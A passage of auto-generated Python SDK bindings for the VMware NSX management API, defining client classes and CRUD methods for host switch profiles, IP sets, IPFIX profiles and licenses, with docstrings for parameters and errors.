})
def list(self):
"""
Returns global configurations of a NSX domain grouped by the config
types. These global configurations are valid across NSX domain for
their respective types unless they are overridden by a more granular
configurations.
:rtype: :class:`com.vmware.nsx.model_client.GlobalConfigsListResult`
:return: com.vmware.nsx.model.GlobalConfigsListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list', None)
def resyncconfig(self,
config_type,
global_configs,
):
"""
It is similar to update global configurations but this request would
trigger update even if the configs are unmodified. However, the
realization of the new configurations is config-type specific. Refer to
config-type specific documentation for details about the configuration
push state.
:type config_type: :class:`str`
:param config_type: (required)
:type global_configs: :class:`vmware.vapi.struct.VapiStruct`
:param global_configs: (required)
The parameter must contain all the attributes defined in
:class:`com.vmware.nsx.model_client.GlobalConfigs`.
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.GlobalConfigs
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.GlobalConfigs`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('resyncconfig',
{
'config_type': config_type,
'global_configs': global_configs,
})
def update(self,
config_type,
global_configs,
):
"""
:type config_type: :class:`str`
:param config_type: (required)
:type global_configs: :class:`vmware.vapi.struct.VapiStruct`
:param global_configs: (required)
The parameter must contain all the attributes defined in
:class:`com.vmware.nsx.model_client.GlobalConfigs`.
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.GlobalConfigs
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.GlobalConfigs`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'config_type': config_type,
'global_configs': global_configs,
})
class HostSwitchProfiles(VapiInterface):
"""
"""
LIST_HOSTSWITCH_PROFILE_TYPE_UPLINKHOSTSWITCHPROFILE = "UplinkHostSwitchProfile"
"""
Possible value for ``hostswitchProfileType`` of method
:func:`HostSwitchProfiles.list`.
"""
LIST_HOSTSWITCH_PROFILE_TYPE_LLDPHOSTSWITCHPROFILE = "LldpHostSwitchProfile"
"""
Possible value for ``hostswitchProfileType`` of method
:func:`HostSwitchProfiles.list`.
"""
LIST_HOSTSWITCH_PROFILE_TYPE_NIOCPROFILE = "NiocProfile"
"""
Possible value for ``hostswitchProfileType`` of method
:func:`HostSwitchProfiles.list`.
"""
LIST_HOSTSWITCH_PROFILE_TYPE_EXTRACONFIGHOSTSWITCHPROFILE = "ExtraConfigHostSwitchProfile"
"""
Possible value for ``hostswitchProfileType`` of method
:func:`HostSwitchProfiles.list`.
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.host_switch_profiles'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _HostSwitchProfilesStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
base_host_switch_profile,
):
"""
Creates a hostswitch profile. The resource_type is required. For uplink
profiles, the teaming and policy parameters are required. By default,
the mtu is 1600 and the transport_vlan is 0. The supported MTU range is
1280 through (uplink_mtu_threshold). (uplink_mtu_threshold) is 9000 by
default. Range can be extended by modifying (uplink_mtu_threshold) in
SwitchingGlobalConfig to the required upper threshold.
:type base_host_switch_profile: :class:`vmware.vapi.struct.VapiStruct`
:param base_host_switch_profile: (required)
The parameter must contain all the attributes defined in
:class:`com.vmware.nsx.model_client.BaseHostSwitchProfile`.
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.BaseHostSwitchProfile
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.BaseHostSwitchProfile`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'base_host_switch_profile': base_host_switch_profile,
})
def delete(self,
host_switch_profile_id,
):
"""
Deletes a specified hostswitch profile.
:type host_switch_profile_id: :class:`str`
:param host_switch_profile_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'host_switch_profile_id': host_switch_profile_id,
})
def get(self,
host_switch_profile_id,
):
"""
Returns information about a specified hostswitch profile.
:type host_switch_profile_id: :class:`str`
:param host_switch_profile_id: (required)
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.BaseHostSwitchProfile
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.BaseHostSwitchProfile`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'host_switch_profile_id': host_switch_profile_id,
})
def list(self,
cursor=None,
hostswitch_profile_type=None,
include_system_owned=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
uplink_teaming_policy_name=None,
):
"""
Returns information about the configured hostswitch profiles.
Hostswitch profiles define networking policies for hostswitches
(sometimes referred to as bridges in OVS). Currently, only uplink
teaming is supported. Uplink teaming allows NSX to load balance traffic
across different physical NICs (PNICs) on the hypervisor hosts.
Multiple teaming policies are supported, including LACP active, LACP
passive, load balancing based on source ID, and failover order.
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type hostswitch_profile_type: :class:`str` or ``None``
:param hostswitch_profile_type: Supported HostSwitch profiles. (optional)
:type include_system_owned: :class:`bool` or ``None``
:param include_system_owned: Whether the list result contains system resources (optional,
default to false)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:type uplink_teaming_policy_name: :class:`str` or ``None``
:param uplink_teaming_policy_name: The host switch profile's uplink teaming policy name (optional)
:rtype: :class:`com.vmware.nsx.model_client.HostSwitchProfilesListResult`
:return: com.vmware.nsx.model.HostSwitchProfilesListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cursor': cursor,
'hostswitch_profile_type': hostswitch_profile_type,
'include_system_owned': include_system_owned,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
'uplink_teaming_policy_name': uplink_teaming_policy_name,
})
def update(self,
host_switch_profile_id,
base_host_switch_profile,
):
"""
Modifies a specified hostswitch profile. The body of the PUT request
must include the resource_type. For uplink profiles, the put request
must also include teaming parameters. Modifiable attributes include
display_name, mtu, and transport_vlan. For uplink teaming policies,
uplink_name and policy are also modifiable.
:type host_switch_profile_id: :class:`str`
:param host_switch_profile_id: (required)
:type base_host_switch_profile: :class:`vmware.vapi.struct.VapiStruct`
:param base_host_switch_profile: (required)
The parameter must contain all the attributes defined in
:class:`com.vmware.nsx.model_client.BaseHostSwitchProfile`.
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.BaseHostSwitchProfile
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.BaseHostSwitchProfile`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'host_switch_profile_id': host_switch_profile_id,
'base_host_switch_profile': base_host_switch_profile,
})
class IpSets(VapiInterface):
"""
"""
CREATE_0_ACTION_ADD_IP = "add_ip"
"""
Possible value for ``action`` of method :func:`IpSets.create_0`.
"""
CREATE_0_ACTION_REMOVE_IP = "remove_ip"
"""
Possible value for ``action`` of method :func:`IpSets.create_0`.
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.ip_sets'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _IpSetsStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
ip_set,
):
"""
Creates a new IPSet that can group either IPv4 or IPv6 individual ip
addresses, ranges or subnets.
:type ip_set: :class:`com.vmware.nsx.model_client.IPSet`
:param ip_set: (required)
:rtype: :class:`com.vmware.nsx.model_client.IPSet`
:return: com.vmware.nsx.model.IPSet
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'ip_set': ip_set,
})
def create_0(self,
ip_set_id,
ip_address_element,
action,
):
"""
Add/Remove an individual IP address to an IPSet
:type ip_set_id: :class:`str`
:param ip_set_id: IP Set Id (required)
:type ip_address_element: :class:`com.vmware.nsx.model_client.IPAddressElement`
:param ip_address_element: (required)
:type action: :class:`str`
:param action: Specifies addition or removal action (required)
:rtype: :class:`com.vmware.nsx.model_client.IPAddressElement`
:return: com.vmware.nsx.model.IPAddressElement
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create_0',
{
'ip_set_id': ip_set_id,
'ip_address_element': ip_address_element,
'action': action,
})
def delete(self,
ip_set_id,
force=None,
):
"""
Deletes the specified IPSet. By default, if the IPSet is added to an
NSGroup, it won't be deleted. In such situations, pass \"force=true\"
as query param to force delete the IPSet.
:type ip_set_id: :class:`str`
:param ip_set_id: IPSet Id (required)
:type force: :class:`bool` or ``None``
:param force: Force delete the resource even if it is being used somewhere
(optional, default to false)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.ConcurrentChange`
Conflict
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'ip_set_id': ip_set_id,
'force': force,
})
def get(self,
ip_set_id,
):
"""
Returns information about the specified IPSet
:type ip_set_id: :class:`str`
:param ip_set_id: IPSet Id (required)
:rtype: :class:`com.vmware.nsx.model_client.IPSet`
:return: com.vmware.nsx.model.IPSet
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'ip_set_id': ip_set_id,
})
def list(self,
cursor=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
Returns paginated list of IPSets
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.IPSetListResult`
:return: com.vmware.nsx.model.IPSetListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cursor': cursor,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
def update(self,
ip_set_id,
ip_set,
):
"""
Updates the specified IPSet. Modifiable parameters include description,
display_name and ip_addresses.
:type ip_set_id: :class:`str`
:param ip_set_id: IPSet Id (required)
:type ip_set: :class:`com.vmware.nsx.model_client.IPSet`
:param ip_set: (required)
:rtype: :class:`com.vmware.nsx.model_client.IPSet`
:return: com.vmware.nsx.model.IPSet
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'ip_set_id': ip_set_id,
'ip_set': ip_set,
})
class IpfixCollectorProfiles(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.ipfix_collector_profiles'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _IpfixCollectorProfilesStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
ipfix_collector_upm_profile,
):
"""
Create a new IPFIX collector profile with essential properties.
:type ipfix_collector_upm_profile: :class:`com.vmware.nsx.model_client.IpfixCollectorUpmProfile`
:param ipfix_collector_upm_profile: (required)
:rtype: :class:`com.vmware.nsx.model_client.IpfixCollectorUpmProfile`
:return: com.vmware.nsx.model.IpfixCollectorUpmProfile
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'ipfix_collector_upm_profile': ipfix_collector_upm_profile,
})
def delete(self,
ipfix_collector_profile_id,
):
"""
Delete an existing IPFIX collector profile by ID.
:type ipfix_collector_profile_id: :class:`str`
:param ipfix_collector_profile_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'ipfix_collector_profile_id': ipfix_collector_profile_id,
})
def get(self,
ipfix_collector_profile_id,
):
"""
Get an existing IPFIX collector profile by profile ID.
:type ipfix_collector_profile_id: :class:`str`
:param ipfix_collector_profile_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.IpfixCollectorUpmProfile`
:return: com.vmware.nsx.model.IpfixCollectorUpmProfile
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'ipfix_collector_profile_id': ipfix_collector_profile_id,
})
def list(self,
cursor=None,
included_fields=None,
page_size=None,
profile_types=None,
sort_ascending=None,
sort_by=None,
):
"""
Query IPFIX collector profiles with list parameters. List result can be
filtered by profile type defined by IpfixCollectorUpmProfileType.
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type profile_types: :class:`str` or ``None``
:param profile_types: IPFIX Collector Profile Type List (optional)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.IpfixCollectorUpmProfileListResult`
:return: com.vmware.nsx.model.IpfixCollectorUpmProfileListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cursor': cursor,
'included_fields': included_fields,
'page_size': page_size,
'profile_types': profile_types,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
def update(self,
ipfix_collector_profile_id,
ipfix_collector_upm_profile,
):
"""
Update an existing IPFIX collector profile with profile ID and modified
properties.
:type ipfix_collector_profile_id: :class:`str`
:param ipfix_collector_profile_id: (required)
:type ipfix_collector_upm_profile: :class:`com.vmware.nsx.model_client.IpfixCollectorUpmProfile`
:param ipfix_collector_upm_profile: (required)
:rtype: :class:`com.vmware.nsx.model_client.IpfixCollectorUpmProfile`
:return: com.vmware.nsx.model.IpfixCollectorUpmProfile
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'ipfix_collector_profile_id': ipfix_collector_profile_id,
'ipfix_collector_upm_profile': ipfix_collector_upm_profile,
})
class IpfixObsPoints(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.ipfix_obs_points'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _IpfixObsPointsStub)
self._VAPI_OPERATION_IDS = {}
def list(self):
"""
Deprecated - Please use /ipfix-profiles for switch IPFIX profile and
/ipfix-collector-profiles for IPFIX collector profile.
:rtype: :class:`com.vmware.nsx.model_client.IpfixObsPointsListResult`
:return: com.vmware.nsx.model.IpfixObsPointsListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list', None)
class IpfixProfiles(VapiInterface):
"""
"""
LIST_APPLIED_TO_ENTITY_TYPE_LOGICALPORT = "LogicalPort"
"""
Possible value for ``appliedToEntityType`` of method
:func:`IpfixProfiles.list`.
"""
LIST_APPLIED_TO_ENTITY_TYPE_LOGICALSWITCH = "LogicalSwitch"
"""
Possible value for ``appliedToEntityType`` of method
:func:`IpfixProfiles.list`.
"""
LIST_APPLIED_TO_ENTITY_TYPE_NSGROUP = "NSGroup"
"""
Possible value for ``appliedToEntityType`` of method
:func:`IpfixProfiles.list`.
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.ipfix_profiles'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _IpfixProfilesStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
ipfix_upm_profile,
):
"""
Create a new IPFIX profile with essential properties.
:type ipfix_upm_profile: :class:`vmware.vapi.struct.VapiStruct`
:param ipfix_upm_profile: (required)
The parameter must contain all the attributes defined in
:class:`com.vmware.nsx.model_client.IpfixUpmProfile`.
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.IpfixUpmProfile
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.IpfixUpmProfile`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'ipfix_upm_profile': ipfix_upm_profile,
})
def delete(self,
ipfix_profile_id,
):
"""
Delete an existing IPFIX profile by ID.
:type ipfix_profile_id: :class:`str`
:param ipfix_profile_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'ipfix_profile_id': ipfix_profile_id,
})
def get(self,
ipfix_profile_id,
):
"""
Get an existing IPFIX profile by profile ID.
:type ipfix_profile_id: :class:`str`
:param ipfix_profile_id: (required)
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.IpfixUpmProfile
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.IpfixUpmProfile`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'ipfix_profile_id': ipfix_profile_id,
})
def list(self,
applied_to_entity_id=None,
applied_to_entity_type=None,
cursor=None,
included_fields=None,
page_size=None,
profile_types=None,
sort_ascending=None,
sort_by=None,
):
"""
Query IPFIX profiles with list parameters. List result can be filtered
by profile type defined by IpfixUpmProfileType.
:type applied_to_entity_id: :class:`str` or ``None``
:param applied_to_entity_id: ID of Entity Applied with Profile (optional)
:type applied_to_entity_type: :class:`str` or ``None``
:param applied_to_entity_type: Supported Entity Types (optional)
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type profile_types: :class:`str` or ``None``
:param profile_types: IPFIX Profile Type List (optional)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.IpfixUpmProfileListResult`
:return: com.vmware.nsx.model.IpfixUpmProfileListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'applied_to_entity_id': applied_to_entity_id,
'applied_to_entity_type': applied_to_entity_type,
'cursor': cursor,
'included_fields': included_fields,
'page_size': page_size,
'profile_types': profile_types,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
def update(self,
ipfix_profile_id,
ipfix_upm_profile,
):
"""
Update an existing IPFIX profile with profile ID and modified
properties.
:type ipfix_profile_id: :class:`str`
:param ipfix_profile_id: (required)
:type ipfix_upm_profile: :class:`vmware.vapi.struct.VapiStruct`
:param ipfix_upm_profile: (required)
The parameter must contain all the attributes defined in
:class:`com.vmware.nsx.model_client.IpfixUpmProfile`.
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.IpfixUpmProfile
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.IpfixUpmProfile`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'ipfix_profile_id': ipfix_profile_id,
'ipfix_upm_profile': ipfix_upm_profile,
})
class Licenses(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.licenses'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _LicensesStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
license,
):
"""
This will add a license key to the system. The API supports adding only
one license key for each license edition type - Standard, Advanced or
Enterprise. If a new license key is tried to add for an edition for
which the license key already exists, then this API will return an
error.
:type license: :class:`com.vmware.nsx.model_client.License`
:param license: (required)
:rtype: :class:`com.vmware.nsx.model_client.License`
:return: com.vmware.nsx.model.License
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
